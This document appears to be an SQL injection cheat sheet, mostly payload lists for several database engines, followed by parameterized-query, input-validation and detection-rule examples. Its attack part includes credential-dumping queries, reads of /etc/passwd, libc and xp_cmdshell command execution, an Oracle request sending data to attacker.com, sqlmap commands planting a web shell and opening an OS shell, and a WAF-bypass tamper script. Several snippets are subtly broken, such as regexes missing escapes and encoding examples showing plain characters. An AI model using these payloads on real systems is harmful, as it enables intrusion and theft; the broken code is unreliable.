Advanced SQL Injection Techniques in 2024

-- MySQL Time-Based Blind Injection
-- Basic payload structure
' OR (SELECT SLEEP(5) WHERE database()='target_db')--

-- Advanced conditional timing
' OR IF(ASCII(SUBSTRING((SELECT database()),1,1))>97,SLEEP(5),SLEEP(0))--

-- PostgreSQL equivalent
' OR (SELECT CASE WHEN (SELECT current_database())='target' THEN pg_sleep(5) ELSE pg_sleep(0) END)--

-- SQL Server timing attack
'; WAITFOR DELAY '00:00:05'--

-- Oracle timing payload
' OR (SELECT CASE WHEN (SELECT user FROM dual)='SYSTEM' THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual) IS NOT NULL--

-- Advanced multi-threading detection bypass
' OR IF((SELECT COUNT(*) FROM information_schema.tables)>50,(SELECT SLEEP(5)),SLEEP(0))--

-- Boolean-based enumeration techniques

-- Database version detection
' OR (SELECT SUBSTRING(@@version,1,1))='5'--

-- Table existence testing
' OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0--

-- Column enumeration
' OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' AND column_name='password')>0--

-- Data extraction using binary search
' OR ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 65--

-- Advanced boolean payload with nested queries
' OR (SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))=1--

-- Length-based enumeration
' OR LENGTH((SELECT database()))=10--

-- Modern UNION-based techniques

-- Column count detection with error handling
' UNION SELECT 1,2,3,4,5,6,7,8,9,10--
' ORDER BY 10--
' GROUP BY 10--

-- Advanced column type matching
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT 1,NULL,NULL,NULL--

-- Information schema extraction
' UNION SELECT table_name,column_name,data_type,is_nullable FROM information_schema.columns--

-- Multi-table data extraction
' UNION SELECT (SELECT GROUP_CONCAT(username,':',password) FROM users),(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables),NULL,NULL--

-- File system access (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL,NULL--

-- PostgreSQL large object manipulation
' UNION SELECT lo_import('/etc/passwd'),NULL,NULL,NULL--

-- Advanced concatenation techniques
' UNION SELECT CONCAT_WS(0x3a,username,password,email) FROM users--

-- Error-based information extraction

-- MySQL error-based techniques
' AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1)x GROUP BY CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))) AND 1=1--

-- Double query technique
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x3a,(SELECT user()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

-- XMLType error (Oracle)
' AND (SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(SELECT user FROM dual)||CHR(62))) FROM dual) IS NULL--

-- PostgreSQL error-based
' AND (SELECT * FROM (SELECT COUNT(*),CHR(126)||CHR(32)||(SELECT current_user)||CHR(126)||CHR(32)||CHR(126) x FROM pg_stat_activity GROUP BY x LIMIT 1)s)--

-- SQL Server error-based
' AND (SELECT 1 WHERE 1=CONVERT(INT,(SELECT @@version)))--

-- Advanced MySQL error functions
' AND EXP(~(SELECT * FROM (SELECT user())x))--
' AND (SELECT JSON_KEYS((SELECT CONCAT('[',database(),']'))))--

// MongoDB injection techniques

// JavaScript injection in $where operator
{"$where": "function() { return this.username == 'admin' && this.password == 'password' }"}

// Boolean-based NoSQL injection
{"username": {"$ne": null}, "password": {"$ne": null}}

// Regular expression injection
{"username": {"$regex": "^admin"}, "password": {"$regex": ".*"}}

// Timing-based NoSQL injection
{"username": "admin", "password": {"$regex": "^a.*", "$options": "i"}}

// Array-based injection
{"username": {"$in": ["admin", "administrator"]}, "password": {"$ne": null}}

// Advanced MongoDB operators
{"$or": [{"username": "admin"}, {"role": "admin"}]}

// JavaScript code execution
{"$where": "sleep(5000); return true;"}

// Blind NoSQL injection for data extraction
{"username": {"$regex": "^a"}, "password": {"$exists": true}}

-- Cassandra-specific injection techniques

-- CQL injection in WHERE clauses
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';

-- Token-based injection
SELECT * FROM users WHERE token(id) > token('') AND username = 'admin';

-- Collections manipulation
UPDATE users SET tags = tags + ['admin'] WHERE username = 'target';

-- Time-based detection (limited)
SELECT * FROM users WHERE username = 'admin' AND password = '' AND writetime(username) > 0;

-- Advanced encoding techniques for WAF bypass

-- URL encoding variations
%27%20OR%201%3D1-- (single quotes and equals)
%2527%2520OR%25201%253D1-- (double URL encoding)

-- Unicode encoding
' OR 1=1-- (Unicode single quote)
/* comment */ (Unicode comment)

-- HTML entity encoding
' OR 1=1-- (HTML single quote)
' OR 1=1-- (Hex HTML entity)

-- Mixed case obfuscation
' Or 1=1--
' oR 1=1--
' OR 1=1--

-- Character substitution
' OR 1=1#
' OR 1=1/*comment*/
' OR 1=1--+

-- Concatenation bypass
CONCAT('adm','in')
'adm'+'in'
'adm'||'in'

-- Advanced hex encoding
0x61646D696E (admin in hex)
CHAR(97,100,109,105,110) (admin using CHAR)

-- Base64 encoding (when processed by application)
YWRtaW4= (admin in base64)

-- Comment-based bypass techniques

-- Multi-line comments
/*! UNION */ SELECT NULL--
/*! 50000 SELECT */ * FROM users

-- Nested comments
/*/*/UNION/*/*/SELECT/*/*/NULL--

-- Version-specific comments (MySQL)
/*!50001 DROP TABLE users*/
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */

-- Conditional comments
/*! IF 1=1 SELECT NULL*/

-- Comment variations
--+
-- -
--
#
/*comment*/
--[comment]--

-- Advanced comment injection
' UN/*comment*/ION SE/*comment*/LECT 1,2,3--

-- Abusing database functions for injection

-- Mathematical functions
' OR PI()=PI()--
' OR POW(1,1)=1--
' OR SQRT(4)=2--

-- String functions
' OR LENGTH(database())>0--
' OR ASCII('a')=97--
' OR ORD('a')=97--

-- Date/time functions
' OR NOW()=NOW()--
' OR CURRENT_TIMESTAMP=CURRENT_TIMESTAMP--
' OR YEAR(NOW())>2020--

-- Conditional functions
' OR COALESCE(NULL,1)=1--
' OR IFNULL(NULL,1)=1--
' OR ISNULL(NULL,1)=1-- (SQL Server)

-- Advanced function chaining
' OR IF(LENGTH(database())>5,SLEEP(5),SLEEP(0))--
' OR CASE WHEN LENGTH(user())>4 THEN BENCHMARK(1000000,MD5(1)) ELSE 0 END--

-- Universal polyglot payloads

-- Cross-database union payload
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

-- Multi-engine timing payload
';SELECT PG_SLEEP(5)--
';WAITFOR DELAY '00:00:05'--
';SELECT SLEEP(5)--
';BEGIN DBMS_LOCK.SLEEP(5); END;--

-- Universal comment payload
/*!50000*/--+-
/*--*/--+-
#--+-
--+-

-- Cross-platform string extraction
CONCAT(CHR(65),CHR(66))
CHAR(65)+CHAR(66)
CHR(65)||CHR(66)
CHAR(65,66)

-- Universal error generation
SELECT 1/0--
SELECT 1 WHERE 1=CONVERT(INT,'test')--
SELECT CAST('test' AS INT)--

-- MySQL advanced techniques

-- Information schema exploitation
SELECT table_name,column_name FROM information_schema.columns WHERE table_schema='database_name'

-- File system access
SELECT LOAD_FILE('/etc/passwd')
SELECT 'data' INTO OUTFILE '/tmp/test.txt'
SELECT 'data' INTO DUMPFILE '/tmp/binary.data'

-- MySQL-specific functions
SELECT @@version_comment
SELECT @@version_compile_os
SELECT @@datadir
SELECT USER()
SELECT CURRENT_USER()
SELECT CONNECTION_ID()

-- Advanced MySQL operators
SELECT 1 REGEXP '^[a-d]'
SELECT FIELD('b','a','b','c')
SELECT FIND_IN_SET('b','a,b,c')

-- MySQL privilege escalation
SELECT * FROM mysql.user WHERE user='root'
SELECT File_priv FROM mysql.user WHERE user='current_user'

-- Advanced timing techniques
SELECT BENCHMARK(1000000,MD5(1))
SELECT GET_LOCK('test',5)

-- PostgreSQL advanced techniques

-- System information
SELECT version()
SELECT current_database()
SELECT current_user
SELECT session_user
SELECT current_schema()

-- PostgreSQL-specific functions
SELECT pg_read_file('/etc/passwd')
SELECT pg_ls_dir('/tmp')
SELECT pg_stat_file('/etc/passwd')

-- Command execution (if superuser)
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('id')

-- Large objects manipulation
SELECT lo_import('/etc/passwd')
SELECT lo_export(12345, '/tmp/exported')

-- Array operations
SELECT array_upper(array['a','b','c'], 1)
SELECT unnest(array['a','b','c'])

-- Advanced PostgreSQL casting
SELECT 'test'::text
SELECT '123'::integer
SELECT current_timestamp::text

-- SQL Server advanced techniques

-- System information
SELECT @@version
SELECT SERVERPROPERTY('ProductVersion')
SELECT HOST_NAME()
SELECT SUSER_SNAME()
SELECT DB_NAME()

-- Extended stored procedures
EXEC xp_cmdshell 'dir'
EXEC sp_configure 'show advanced options', 1
EXEC sp_configure 'xp_cmdshell', 1

-- File system access
BULK INSERT temp FROM 'c:\temp\file.txt'
SELECT * FROM OPENROWSET(BULK 'c:\temp\file.txt', SINGLE_BLOB) AS Contents

-- Registry access
EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER'

-- SQL Server specific functions
SELECT NEWID()
SELECT SCOPE_IDENTITY()
SELECT @@IDENTITY
SELECT DATEPART(year, GETDATE())

-- Advanced error handling
BEGIN TRY
    SELECT 1/0
END TRY
BEGIN CATCH
    SELECT ERROR_MESSAGE()
END CATCH

-- Oracle advanced techniques

-- System information
SELECT * FROM v$version
SELECT user FROM dual
SELECT banner FROM sys.v_$version

-- Oracle-specific functions
SELECT SYS_CONTEXT('USERENV','SESSION_USER') FROM dual
SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual
SELECT SYS_CONTEXT('USERENV','HOST') FROM dual

-- Oracle command execution
SELECT UTL_HTTP.REQUEST('http://attacker.com/receive.php?data='||user) FROM dual
SELECT HTTPURITYPE('http://attacker.com').getclob() FROM dual

-- File system access (if privileges allow)
SELECT UTL_FILE.FCOPY('SRC_DIR','source.txt','DEST_DIR','dest.txt') FROM dual

-- Advanced Oracle functions
SELECT EXTRACT(year FROM SYSDATE) FROM dual
SELECT TO_CHAR(SYSDATE, 'YYYY-MM-DD') FROM dual
SELECT RAWTOHEX(UTL_RAW.CAST_TO_RAW('test')) FROM dual

-- Oracle error-based techniques
SELECT UTL_INADDR.GET_HOST_NAME((SELECT user FROM dual)) FROM dual

# SQLMap advanced usage examples

# Basic assessment with custom headers
sqlmap -u "http://target.com/page.php?id=1" --headers="X-Forwarded-For: 127.0.0.1"

# POST data testing with custom tamper scripts
sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" --tamper=space2comment,charencode

# Advanced enumeration
sqlmap -u "http://target.com/page.php?id=1" --dbs --tables --columns --dump

# Custom injection techniques
sqlmap -u "http://target.com/page.php?id=1" --technique=BEUST --level=5 --risk=3

# WAF bypass with multiple tamper scripts
sqlmap -u "http://target.com/page.php?id=1" --tamper=between,randomcase,space2comment --random-agent

# Second-order injection testing
sqlmap -u "http://target.com/register.php" --data="username=test&email=test@test.com" --second-order="http://target.com/profile.php"

# Custom payloads and suffixes
sqlmap -u "http://target.com/page.php?id=1" --prefix="'))" --suffix="--"

# Advanced file system operations
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# OS command execution
sqlmap -u "http://target.com/page.php?id=1" --os-shell --os-cmd="whoami"

#!/usr/bin/env python
# Custom SQLMap tamper script example

import re
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Custom tamper script for advanced WAF bypass
    """
    
    retVal = payload
    
    if payload:
        # Replace spaces with comments
        retVal = re.sub(r's+', '/**/', retVal)
        
        # Replace equals with LIKE
        retVal = retVal.replace('=', ' LIKE ')
        
        # Add hex encoding for strings
        retVal = re.sub(r"'([^']+)'", lambda m: "0x" + m.group(1).encode('hex'), retVal)
        
        # Replace UNION with nested SELECT
        retVal = retVal.replace('UNION', 'UNION/*!00001*/')
        
        # Add random case variations
        for keyword in ['SELECT', 'FROM', 'WHERE', 'AND', 'OR']:
            retVal = re.sub(r'' + keyword + r'', 
                          lambda m: ''.join(c.upper() if i % 2 else c.lower() 
                                          for i, c in enumerate(keyword)), 
                          retVal, flags=re.IGNORECASE)
    
    return retVal

// Language-specific parameterized query examples

// PHP PDO
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);

// Java PreparedStatement
String sql = "SELECT * FROM users WHERE username = ? AND password = ?";
PreparedStatement pstmt = connection.prepareStatement(sql);
pstmt.setString(1, username);
pstmt.setString(2, password);
ResultSet rs = pstmt.executeQuery();

// C# SqlCommand
string sql = "SELECT * FROM users WHERE username = @username AND password = @password";
SqlCommand cmd = new SqlCommand(sql, connection);
cmd.Parameters.AddWithValue("@username", username);
cmd.Parameters.AddWithValue("@password", password);

// Python psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password))

// Node.js with parameterized queries
const query = "SELECT * FROM users WHERE username = $1 AND password = $2";
const result = await client.query(query, [username, password]);

// Ruby ActiveRecord (ORM)
User.where(username: username, password: password)

-- MySQL Stored Procedure
DELIMITER $$
CREATE PROCEDURE GetUser(IN p_username VARCHAR(50), IN p_password VARCHAR(100))
BEGIN
    SELECT * FROM users WHERE username = p_username AND password = p_password;
END$$
DELIMITER ;

// Comprehensive input validation examples

// PHP input validation
function validateInput($input, $type) {
    switch($type) {
        case 'username':
            return preg_match('/^[a-zA-Z0-9_]{3,20}$/', $input);
        case 'email':
            return filter_var($input, FILTER_VALIDATE_EMAIL);
        case 'integer':
            return filter_var($input, FILTER_VALIDATE_INT);
        case 'alphanumeric':
            return ctype_alnum($input);
    }
    return false;
}

// Java input validation
public class InputValidator {
    private static final Pattern USERNAME_PATTERN = 
        Pattern.compile("^[a-zA-Z0-9_]{3,20}$");
    
    public static boolean isValidUsername(String username) {
        return username != null && USERNAME_PATTERN.matcher(username).matches();
    }
    
    public static boolean isValidInteger(String input) {
        try {
            Integer.parseInt(input);
            return true;
        } catch (NumberFormatException e) {
            return false;
        }
    }
}

// Python input validation
import re
from typing import Union

class InputValidator:
    USERNAME_PATTERN = re.compile(r'^[a-zA-Z0-9_]{3,20}$')
    
    @staticmethod
    def validate_username(username: str) -> bool:
        return bool(username and InputValidator.USERNAME_PATTERN.match(username))
    
    @staticmethod
    def validate_integer(value: Union[str, int]) -> bool:
        try:
            int(value)
            return True
        except (ValueError, TypeError):
            return False

// JavaScript/Node.js validation
const validator = require('validator');

function validateInput(input, type) {
    switch(type) {
        case 'username':
            return /^[a-zA-Z0-9_]{3,20}$/.test(input);
        case 'email':
            return validator.isEmail(input);
        case 'integer':
            return validator.isInt(input.toString());
        case 'url':
            return validator.isURL(input);
        default:
            return false;
    }
}

# Advanced SQL injection detection rules

# Suricata/Snort rules
alert tcp any any -> any any (msg:"SQL Injection Attack Detected"; content:"UNION"; content:"SELECT"; distance:0; within:50; sid:1000001; rev:1;)
alert tcp any any -> any any (msg:"Time-based SQL Injection"; content:"SLEEP("; sid:1000002; rev:1;)
alert tcp any any -> any any (msg:"Error-based SQL Injection"; content:"mysql_fetch"; sid:1000003; rev:1;)

# YARA rules for SQL injection patterns
rule SQL_Injection_Patterns {
    meta:
        description = "Detects common SQL injection patterns"
        author = "Security Team"
    strings:
        $union = "UNION" nocase
        $select = "SELECT" nocase
        $sleep = "SLEEP(" nocase
        $benchmark = "BENCHMARK(" nocase
        $load_file = "LOAD_FILE(" nocase
        $into_outfile = "INTO OUTFILE" nocase
    condition:
        ($union and $select) or $sleep or $benchmark or $load_file or $into_outfile
}

# Splunk search queries
index=web_logs | regex _raw="(?i)(union.+select|sleep(|benchmark(|load_file()"
index=web_logs | eval sql_injection_score=if(match(_raw,"(?i)union.+select"),5,0) + if(match(_raw,"(?i)sleep("),3,0) | where sql_injection_score > 3

# ELK Stack detection rules
{
  "query": {
    "bool": {
      "should": [
        {"regexp": {"request.raw": ".*(?i)union.*select.*"}},
        {"regexp": {"request.raw": ".*(?i)sleep\(.*"}},
        {"regexp": {"request.raw": ".*(?i)benchmark\(.*"}}
      ],
      "minimum_should_match": 1
    }
  }
}